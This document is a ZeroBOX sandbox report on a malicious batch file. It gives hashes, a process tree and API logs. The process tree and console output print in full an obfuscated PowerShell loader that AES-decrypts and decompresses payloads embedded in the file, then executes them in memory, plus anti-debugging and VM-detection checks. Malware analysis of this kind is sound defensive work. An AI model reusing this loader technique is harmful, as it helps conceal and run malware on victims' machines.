Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 21, 2023, 7:48 a.m.	June 21, 2023, 7:50 a.m.

Size	998.9KB
Type	DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5	`b3ca3299d9eb527a687232c6ec7bd05e`
SHA256	`561cbe3e6bc18eac2a78545d5d6da27b559fb8040256fad41454ee30a6a7483b`
CRC32	`6A933183`
ssdeep	`12288:k+OmToydDoCViG60XQ9APT70WPKAL5VUtQRf/8YN5i+FgHYmwHfYPy00OrdMUJ0Z:kpQtRo9APT9ZpfN5WVEleyNQVe`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "vfrjvoBTejgvVag" C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat
2568
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat
  2644
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat
    2756
    - Hceea_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat.exe" -w hidden -c $pEMo='TraMBJvnsfMBJvorMBJvmFMBJvinaMBJvlBlMBJvoMBJvckMBJv'.Replace('MBJv', '');$iyaC='LMBJvoMBJvadMBJv'.Replace('MBJv', '');$tcQw='RMBJveadLMBJviMBJvneMBJvsMBJv'.Replace('MBJv', '');$KuMS='CMBJvhMBJvangMBJveEMBJvxMBJvtenMBJvsioMBJvnMBJv'.Replace('MBJv', '');$trmt='CreMBJvateDMBJvecMBJvrMBJvypMBJvtorMBJv'.Replace('MBJv', '');$fUaA='GeMBJvtMBJvCurMBJvrentMBJvProMBJvcMBJveMBJvssMBJv'.Replace('MBJv', '');$jFAl='EMBJvleMBJvmeMBJvntAMBJvtMBJv'.Replace('MBJv', '');$GMsR='SplMBJvitMBJv'.Replace('MBJv', '');$SgZi='EntMBJvrMBJvyMBJvPMBJvoMBJvinMBJvtMBJv'.Replace('MBJv', '');$AotJ='FrMBJvomBaMBJvsMBJve6MBJv4StMBJvriMBJvngMBJv'.Replace('MBJv', '');$NumX='MMBJvainMBJvModMBJvulMBJveMBJv'.Replace('MBJv', '');$SCtU='IMBJvnvMBJvokMBJveMBJv'.Replace('MBJv', '');function gYYuy($Ztzwf){$NuTmR=[System.Security.Cryptography.Aes]::Create();$NuTmR.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NuTmR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NuTmR.Key=[System.Convert]::$AotJ('9RE7z9qQbXo70lNlRZf0jPT2QRG4KCsVkZBJkUBk4l4=');$NuTmR.IV=[System.Convert]::$AotJ('A1++iPLzbLBcVKc2yItI3g==');$BvNdb=$NuTmR.$trmt();$wrDar=$BvNdb.$pEMo($Ztzwf,0,$Ztzwf.Length);$BvNdb.Dispose();$NuTmR.Dispose();$wrDar;}function pFMIH($Ztzwf){$XcMqn=New-Object System.IO.MemoryStream(,$Ztzwf);$ffVFP=New-Object System.IO.MemoryStream;$MiwFe=New-Object System.IO.Compression.GZipStream($XcMqn,[IO.Compression.CompressionMode]::Decompress);$MiwFe.CopyTo($ffVFP);$MiwFe.Dispose();$XcMqn.Dispose();$ffVFP.Dispose();$ffVFP.ToArray();}$uxbhR=[System.Linq.Enumerable]::$jFAl([System.IO.File]::$tcQw([System.IO.Path]::$KuMS([System.Diagnostics.Process]::$fUaA().$NumX.FileName, $null)), 1);$XmldQ=$uxbhR.Substring(2).$GMsR(':');$bUPcU=pFMIH (gYYuy ([Convert]::$AotJ($XmldQ[0])));$LzWhx=pFMIH (gYYuy ([Convert]::$AotJ($XmldQ[1])));[System.Reflection.Assembly]::$iyaC([byte[]]$LzWhx).$SgZi.$SCtU($null,$null);[System.Reflection.Assembly]::$iyaC([byte[]]$bUPcU).$SgZi.$SCtU($null,$null);
      2852

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA June 21, 2023, 7:46 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW June 21, 2023, 7:46 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 21, 2023, 7:46 a.m.			0	0

Command line console output was observed (32 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: At line:1 char:990 console_handle: 0x0000002f	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: + $pEMo='TraMBJvnsfMBJvorMBJvmFMBJvinaMBJvlBlMBJvoMBJvckMBJv'.Replace('MBJv', ' console_handle: 0x0000003b	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ');$iyaC='LMBJvoMBJvadMBJv'.Replace('MBJv', '');$tcQw='RMBJveadLMBJviMBJvneMBJv console_handle: 0x00000047	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: sMBJv'.Replace('MBJv', '');$KuMS='CMBJvhMBJvangMBJveEMBJvxMBJvtenMBJvsioMBJvnMB console_handle: 0x00000053	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: Jv'.Replace('MBJv', '');$trmt='CreMBJvateDMBJvecMBJvrMBJvypMBJvtorMBJv'.Replace console_handle: 0x0000005f	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ('MBJv', '');$fUaA='GeMBJvtMBJvCurMBJvrentMBJvProMBJvcMBJveMBJvssMBJv'.Replace( console_handle: 0x0000006b	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: 'MBJv', '');$jFAl='EMBJvleMBJvmeMBJvntAMBJvtMBJv'.Replace('MBJv', '');$GMsR='Sp console_handle: 0x00000077	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: lMBJvitMBJv'.Replace('MBJv', '');$SgZi='EntMBJvrMBJvyMBJvPMBJvoMBJvinMBJvtMBJv' console_handle: 0x00000083	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: .Replace('MBJv', '');$AotJ='FrMBJvomBaMBJvsMBJve6MBJv4StMBJvriMBJvngMBJv'.Repla console_handle: 0x0000008f	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ce('MBJv', '');$NumX='MMBJvainMBJvModMBJvulMBJveMBJv'.Replace('MBJv', '');$SCtU console_handle: 0x0000009b	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ='IMBJvnvMBJvokMBJveMBJv'.Replace('MBJv', '');function gYYuy($Ztzwf){$NuTmR=[Sy console_handle: 0x000000a7	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: stem.Security.Cryptography.Aes]::Create();$NuTmR.Mode=[System.Security.Cryptogr console_handle: 0x000000b3	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: aphy.CipherMode]::CBC;$NuTmR.Padding=[System.Security.Cryptography.PaddingMode] console_handle: 0x000000bf	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ::PKCS7;$NuTmR.Key=[System.Convert]::$AotJ( <<<< '9RE7z9qQbXo70lNlRZf0jPT2QRG4K console_handle: 0x000000cb	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: CsVkZBJkUBk4l4=');$NuTmR.IV=[System.Convert]::$AotJ('A1++iPLzbLBcVKc2yItI3g==') console_handle: 0x000000d7	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ;$BvNdb=$NuTmR.$trmt();$wrDar=$BvNdb.$pEMo($Ztzwf,0,$Ztzwf.Length);$BvNdb.Dispo console_handle: 0x000000e3	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: se();$NuTmR.Dispose();$wrDar;}function pFMIH($Ztzwf){$XcMqn=New-Object System.I console_handle: 0x000000ef	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: O.MemoryStream(,$Ztzwf);$ffVFP=New-Object System.IO.MemoryStream;$MiwFe=New-Obj console_handle: 0x000000fb	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ect System.IO.Compression.GZipStream($XcMqn,[IO.Compression.CompressionMode]::D console_handle: 0x00000107	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ecompress);$MiwFe.CopyTo($ffVFP);$MiwFe.Dispose();$XcMqn.Dispose();$ffVFP.Dispo console_handle: 0x00000113	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: se();$ffVFP.ToArray();}$uxbhR=[System.Linq.Enumerable]::$jFAl([System.IO.File]: console_handle: 0x0000011f	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: :$tcQw([System.IO.Path]::$KuMS([System.Diagnostics.Process]::$fUaA().$NumX.File console_handle: 0x0000012b	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: Name, $null)), 1);$XmldQ=$uxbhR.Substring(2).$GMsR(':');$bUPcU=pFMIH (gYYuy ([C console_handle: 0x00000137	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: onvert]::$AotJ($XmldQ[0])));$LzWhx=pFMIH (gYYuy ([Convert]::$AotJ($XmldQ[1]))); console_handle: 0x00000143	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: [System.Reflection.Assembly]::$iyaC([byte[]]$LzWhx).$SgZi.$SCtU($null,$null);[S console_handle: 0x0000014f	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ystem.Reflection.Assembly]::$iyaC([byte[]]$bUPcU).$SgZi.$SCtU($null,$null); console_handle: 0x0000015b	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR console_handle: 0x00000167	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ecordException console_handle: 0x00000173	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken console_handle: 0x0000017f	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004106a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 21, 2023, 7:46 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02800000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ee2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f6b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f67000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eeb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f65000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f6c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
